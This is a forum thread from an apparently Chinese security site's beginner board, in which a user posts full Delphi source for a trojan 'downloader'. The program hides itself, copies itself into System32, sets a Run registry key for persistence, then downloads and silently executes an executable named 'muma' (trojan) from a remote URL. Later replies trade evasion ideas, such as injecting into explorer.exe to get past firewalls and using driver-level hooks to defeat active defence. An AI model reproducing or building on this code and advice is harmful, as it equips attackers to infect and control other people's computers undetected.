|
 | 作者: Winmillion [winmillion]
 论坛用户 |
登录 |
| unit Unit1; interface uses Windows, Messages, Classes, ExtCtrls, SysUtils, Variants, Graphics, Controls, Forms, Dialogs, UrlMon,Registry; type TForm1 = class(TForm) Timer1: TTimer; procedure Timer1Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} Function GetWinDir: String; //自定义GetWinDir函数,该功能是找出Windows\System32\的路径. var Buf:array[0..MAX_PATH] of char; begin GetSystemDirectory(Buf,MAX_PATH); Result:= Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end; procedure TForm1.Timer1Timer(Sender: TObject); //时间控件 begin WinExec('c:\muma.exe',SW_HIDE); //每隔5秒执行一次 Timer1.Enabled:=False; end; procedure TForm1.FormCreate(Sender: TObject); var Reg:TRegistry; myname:string; begin application.showmainform:=false; //隐藏窗体 myname:=ExtractFilename(Application.Exename); //获得文件名 if application.Exename <> GetWindir + myname then //判断程序是否在Windows\System32\ begin Copyfile(pchar(application.Exename),pchar(GetWindir + myname),False); //将自己拷贝到Windows\System32\下 Winexec(pchar(GetWindir + myname),sw_hide); //运行Windows\System32\下的新程序,不运行也可以! application.Terminate; //退出旧程序 end; begin try try Reg:=TRegistry.Create; Reg.RootKey:=HKEY_LOCAL_MACHINE; if Reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True) then begin Reg.WriteString('Winmillion',GetWinDir+myname); Reg.CloseKey; Reg.Free; end; except end; if not FileExists('c:\muma.exe') then //判断木马如果不在C盘里就只是Timer begin URLDownloadToFile(nil,PChar('http://www.baidu.com/muma.exe'), PChar('c:\muma.exe'),0,nil); WinExec('c:\muma.exe',SW_HIDE); end else Timer1.Enabled := True; except end; end; end; end. |
| 地主 发表时间: 09-03-09 21:37 |
| 回复: snqmyy023 [snqmyy023]  论坛用户 |
登录 |
|
顶你一下 |
| B1层 发表时间: 09-03-11 11:53 |
| 回复: Winmillion [winmillion] 论坛用户 |
登录 |
|
只是个人累积收藏,拿出来共享给各位. 各位不要老是收藏,要经常使用,直到习惯就可以不用收藏了. 记住:技术没学进去,永远也不属于自己. |
| B2层 发表时间: 09-03-15 22:11 |
 | 回复: wstarp [wstarp]  论坛用户 |
登录 |
问问 我是菜鸟 什么都不懂 一点都不懂的.! |
| B3层 发表时间: 09-03-16 13:29 |
| 回复: wstarp [wstarp] 论坛用户 |
登录 |
|
问问 我是菜鸟 什么都不懂 一点都不懂的.! |
| B4层 发表时间: 09-03-16 13:31 |
 | 回复: bking [bking]  版主 |
登录 |
|
呵呵。其实下载者软件真的很简单 |
| B5层 发表时间: 09-03-17 17:49 |
| 回复: Winmillion [winmillion] 论坛用户 |
登录 |
|
没有谁一出生就是天才,只有不断的累积,直到领悟.相信你一定能成功的! 未来早已安排,命运早已注定,只是未发生 |
| B6层 发表时间: 09-03-20 23:41 |
| 回复: Winmillion [winmillion] 论坛用户 |
登录 |
|
没有谁一出生就是天才,只有不断的累积,直到领悟.相信你一定能成功的! 未来早已安排,命运早已注定,只是未发生 |
| B7层 发表时间: 09-03-20 23:42 |
| 回复: livly [livly] 论坛用户 |
登录 |
新人,看不懂 |
| B8层 发表时间: 09-04-01 19:01 |
| 回复: studentol [studentol]  论坛用户 |
登录 |
|
还是在掉用API的基础上 没有HOOK 很容易被拦截 我的建议是 采用驱动底层钩子 直接监听数据包 通过简单处理 达到下载的目的 但问题是 主动防御的突破很不容易呀 尤其是驱动级的 |
| B9层 发表时间: 09-04-03 01:48 |
| 回复: Winmillion [winmillion] 论坛用户 |
登录 |
|
用插入IEXPLORER..EXE或插入EXPLORER.EXE进程就可以穿过防火墙了. 可是现在很少有人用IE浏览器上网,可是桌面进程EXPLORER.EXE一般防火墙如:天网都是允许桌面进程打开端口.这样就可以穿过防火墙了. |
| B10层 发表时间: 09-04-03 22:07 |
| 回复: studentol [studentol] 论坛用户 |
登录 |
|
这样的方法 讨论的太多了 而进程的插入 几乎是逃避不了主动防御的 如果你的方法能逃避 哪怕冰剑 的侦测 我都要佩服你了 底层驱动 比杀毒软件跟底层 权利更大 隐蔽性更高 是未来的主要发展方向 |
| B11层 发表时间: 09-04-03 23:25 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 写了个普通的下载者